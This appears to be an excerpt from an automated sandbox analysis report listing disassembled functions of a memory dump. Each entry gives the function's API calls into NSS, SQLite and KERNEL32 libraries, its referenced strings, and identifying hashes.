Function 6CA0AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CB2CF46,?,6C9FCDBD,?,6CB2BF31,?,?,?,?,?,?,?), ref: 6CA0B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB2CF46,?,6C9FCDBD,?,6CB2BF31), ref: 6CA0B090
sqlite3_free.NSS3(?,?,?,?,?,?,6CB2CF46,?,6C9FCDBD,?,6CB2BF31), ref: 6CA0B0A2
CloseHandle.KERNEL32(?,?,6CB2CF46,?,6C9FCDBD,?,6CB2BF31,?,?,?,?,?,?,?,?,?), ref: 6CA0B100
sqlite3_free.NSS3(?,?,00000002,?,6CB2CF46,?,6C9FCDBD,?,6CB2BF31,?,?,?,?,?,?,?), ref: 6CA0B115
sqlite3_free.NSS3(?,?,?,?,?,?,6CB2CF46,?,6C9FCDBD,?,6CB2BF31), ref: 6CA0B12D

Part of subcall function 6C9F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA0C6FD,?,?,?,?,6CA5F965,00000000), ref: 6C9F9F0E
Part of subcall function 6C9F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CA5F965,00000000), ref: 6C9F9F5D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: de3771b4e62eb55fcc043e63541c046bdbbb2a100b2cd9982a45ee65186a8874
Instruction ID: 2c1e99b21426f9d745f5e3ea9b68e4ae1859a352401b7d4249d37c5add7eb11c
Opcode Fuzzy Hash: de3771b4e62eb55fcc043e63541c046bdbbb2a100b2cd9982a45ee65186a8874
Instruction Fuzzy Hash: 4A91F1B0B04206CFDB04CF24E985B6BB7B6FF45388F18462DE41697A50EB30E980CB91

Function 6CADBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CADBD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CADBD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CADBD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CADBD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CADBDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CADBDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CADBDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CADBE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CADBE1E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 3d6a5a00f1609df576502cf669b7c055a87a4d9d4db7d098c94a0beed99d8c05
Instruction ID: 4902e7df9b090813f6a339b66a16a40bbd044dc4604943e04563514546b42cca
Opcode Fuzzy Hash: 3d6a5a00f1609df576502cf669b7c055a87a4d9d4db7d098c94a0beed99d8c05
Instruction Fuzzy Hash: 4E217576E0429A57FB004A97AD43B8F32749B9274EF4E0214F936AE781E710B45886A5

Function 6CB88D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CBD14E4,6CB3CC70), ref: 6CB88D47
PR_GetCurrentThread.NSS3 ref: 6CB88D98

Part of subcall function 6CA60F00: PR_GetPageSize.NSS3(6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F1B
Part of subcall function 6CA60F00: PR_NewLogModule.NSS3(clock,6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CB88E7B
htons.WSOCK32(?), ref: 6CB88EDB
PR_GetCurrentThread.NSS3 ref: 6CB88F99
PR_GetCurrentThread.NSS3 ref: 6CB8910A

Strings

%u.%u.%u.%u, xrefs: 6CB88E74

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 61d1b71560a97868453522e107ebbcd8361a85b9967034e60f445f7aa67e5a17
Instruction ID: e5e31ded14d86bda1e8a24046743e06e3bcea105a5f9e5406af5833c9fa43688
Opcode Fuzzy Hash: 61d1b71560a97868453522e107ebbcd8361a85b9967034e60f445f7aa67e5a17
Instruction Fuzzy Hash: 6E028931D4B2D18FEF18CF19C46876ABBA3EF42304F19825AD8915FA91C732D949C791

Function 6CB068E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6CB068FC
PR_EnterMonitor.NSS3 ref: 6CB06924

Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390AB
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390C9
Part of subcall function 6CB39090: EnterCriticalSection.KERNEL32 ref: 6CB390E5
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB39116
Part of subcall function 6CB39090: LeaveCriticalSection.KERNEL32 ref: 6CB3913F

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

PR_EnterMonitor.NSS3 ref: 6CB0693E
TlsGetValue.KERNEL32 ref: 6CB06977
TlsGetValue.KERNEL32 ref: 6CB069B8
PR_ExitMonitor.NSS3 ref: 6CB06B1E
PR_ExitMonitor.NSS3 ref: 6CB06B39
TlsGetValue.KERNEL32 ref: 6CB06B62

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 5c6dafe72b9ba848406278b0a70dc76f89076d1325c7e07c199df75847a50fea
Instruction ID: 9ea13a4bb10d3eabb0cd4655262d8320c7c3f1a5eba3c48fb50295661c1d53d4
Opcode Fuzzy Hash: 5c6dafe72b9ba848406278b0a70dc76f89076d1325c7e07c199df75847a50fea
Instruction Fuzzy Hash: CB9159B4B58690CBEB50DF6DC4C155E7FA2EB87308B618299DC448BA29D731D9C1CB82

Function 6CA0EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

sqlite_master, xrefs: 6CA0F0AB, 6CA0F2DA, 6CA0F757, 6CA0F93E
authorizer malfunction, xrefs: 6CA0F95C, 6CA0F9BF, 6CA0FA5E, 6CA0FA8B
table, xrefs: 6CA0F05C, 6CA0FABC, 6CA0FAC7
not authorized, xrefs: 6CA0F957, 6CA0F9BA
%s %T already exists, xrefs: 6CA0FAC8
sqlite_temp_master, xrefs: 6CA0F0A6, 6CA0F2D5
there is already an index named %s, xrefs: 6CA0F9D7
temporary table name must be unqualified, xrefs: 6CA0F734
view, xrefs: 6CA0F061, 6CA0F071, 6CA0FAB7

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 95d838932fd4d55fd2b50a3afcc721d5c5690105ddf058044c16ea8a9de7f5e1
Instruction ID: ea1c65b912590cb1bdf6b37c7a5b8aae16c38b54fe163ea43382b871f04a8f5d
Opcode Fuzzy Hash: 95d838932fd4d55fd2b50a3afcc721d5c5690105ddf058044c16ea8a9de7f5e1
Instruction Fuzzy Hash: 2772BE70E042458FDB14CF68D884BAABBF1BF4934CF1881ADC914AB752D775E886CB94

Function 6CB29C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C9FC52B), ref: 6CB29D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB2A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB2A114

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB2A01F, 6CB2A0E4, 6CB2A0FE
%s at line %d of [%.10s], xrefs: 6CB2A02E, 6CB2A10D
database corruption, xrefs: 6CB2A029, 6CB2A108

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: 9dbcdd86cb29a9f91da21d664961afbf0808c88c2ad071b653e2dac7c56c9a26
Instruction ID: a92ef90d30c65e18081bfc67197d8e3b1d093d13038720713f7c33ece372b2e6
Opcode Fuzzy Hash: 9dbcdd86cb29a9f91da21d664961afbf0808c88c2ad071b653e2dac7c56c9a26
Instruction Fuzzy Hash: EA229E71A0C3819FC704CF29C49062AB7E1FF8A745F148A2DE9DE97651D739E849CB42

Function 6CA909A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA906A0: TlsGetValue.KERNEL32 ref: 6CA906C2
Part of subcall function 6CA906A0: EnterCriticalSection.KERNEL32(?), ref: 6CA906D6
Part of subcall function 6CA906A0: PR_Unlock.NSS3 ref: 6CA906EB

memcmp.VCRUNTIME140(00000000,6CA79B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6CA79B8A,00000000,6CA72D6B), ref: 6CA909D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6CA79B8A,00000000,6CA72D6B), ref: 6CA909F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CA79B8A,00000000,6CA72D6B), ref: 6CA90A1C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CA79B8A,00000000,6CA72D6B), ref: 6CA90A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CA79B8A,00000000,6CA72D6B), ref: 6CA90A48

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: 29ca9537e9bea33322e4e0479a332204eed8bcd11e99610050730d1842d9fb24
Instruction ID: 174893c0aab9a41655e0476cab4fdbb12119da417bc8a733952eaff49583a014
Opcode Fuzzy Hash: 29ca9537e9bea33322e4e0479a332204eed8bcd11e99610050730d1842d9fb24
Instruction Fuzzy Hash: 0602E2B5E102049FEB008F65DD42BAB77F9EF48398F180129E905A7B51E731ED89CB91

Function 6CB49D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CA08637,?,?), ref: 6CB49E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CA08637), ref: 6CB49ED6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB49EC0
%s at line %d of [%.10s], xrefs: 6CB49ECF
database corruption, xrefs: 6CB49ECA

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 411ea0ecfcf1e099fc63bb17a55374a872090215d09dda26ee77e5fa96f16609
Instruction ID: df7e44c89b63d5d222f9102454b7644b619cdf8c5b8f1f88cfea60139baa83e6
Opcode Fuzzy Hash: 411ea0ecfcf1e099fc63bb17a55374a872090215d09dda26ee77e5fa96f16609
Instruction Fuzzy Hash: 9381AF31F452558FDB04CFA9CA80ADEB3FAEB49304B148529E819AB749E730ED49CB51

Function 6CA50820 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6CA511D2

Strings

authorizer malfunction, xrefs: 6CA51BD2
@, xrefs: 6CA50B17
not authorized, xrefs: 6CA5175E, 6CA51763
rows deleted, xrefs: 6CA517D2

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memset
String ID: @$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-4041583037
Opcode ID: 7921e6a6fbce3d09300ce48a87a3d8f11baa801a72b352c86bc1e7172e5f3ac1
Instruction ID: 91817f9b2cad07d4abfecdc27821a374314e2db9fb0867c3a4cefe2155ee43c4
Opcode Fuzzy Hash: 7921e6a6fbce3d09300ce48a87a3d8f11baa801a72b352c86bc1e7172e5f3ac1
Instruction Fuzzy Hash: 51D2AC70E04249CFDB14CFA9C484BADBBF1BF49308F688169D515ABB51D735E8A6CB80

Function 6CAD9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CAD9ED6

Part of subcall function 6CAD14C0: TlsGetValue.KERNEL32 ref: 6CAD14E0
Part of subcall function 6CAD14C0: EnterCriticalSection.KERNEL32 ref: 6CAD14F5
Part of subcall function 6CAD14C0: PR_Unlock.NSS3 ref: 6CAD150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CAD9EE4

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAD9F38

Part of subcall function 6CADD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6CAD9F0B), ref: 6CADD03B
Part of subcall function 6CADD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CADD04E
Part of subcall function 6CADD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6CADD07B
Part of subcall function 6CADD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6CADD08E
Part of subcall function 6CADD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CADD09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAD9F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6CAD9F59

Part of subcall function 6CAD9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CAD9C5B), ref: 6CAD9D82
Part of subcall function 6CAD9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CAD9C5B), ref: 6CAD9DA9
Part of subcall function 6CAD9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CAD9C5B), ref: 6CAD9DCE
Part of subcall function 6CAD9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CAD9C5B), ref: 6CAD9E43

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: 8fab6e919dd8effee2891ec99f4a5225059fa018bfd9fcd16aa7c1a501b36c32
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 23115BB5F042015BF7009A709D10BAB73A4AF9835CF160234E90A8BB40FF61F99C82D2

Function 6CB8CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB8D086
PR_Malloc.NSS3(00000001), ref: 6CB8D0B9
PR_Free.NSS3(?), ref: 6CB8D138

Strings

>, xrefs: 6CB8CF5B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: d0871c3b214cd2682aac1f5e2a799f391a3d85d3b679cf5ab52f5b0c12365daf
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: CCD15962B836C70BFB14587C9CB13EA7793CB42374F58032BD5218BBE5E61988478352

Function 6CB2AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2758996e74d388af91c2a239c15b8f292b8e0d54161b15c6c9d0b5e41cbdd1f
Instruction ID: 7e98d783bf58dfaf70b32501df60d3ccbdfaf0f574457db5a34c89491802c866
Opcode Fuzzy Hash: b2758996e74d388af91c2a239c15b8f292b8e0d54161b15c6c9d0b5e41cbdd1f
Instruction Fuzzy Hash: EFF1B071F01295CBDB04CF68C8527BE77B8EB4A304F194229C90AD7754EB78AA51CBC1

Function 6CA06F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

sz=[0-9]*, xrefs: 6CA07049
unordered*, xrefs: 6CA0702B
noskipscan*, xrefs: 6CA07067
*?[, xrefs: 6CA07034, 6CA07052, 6CA07070

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
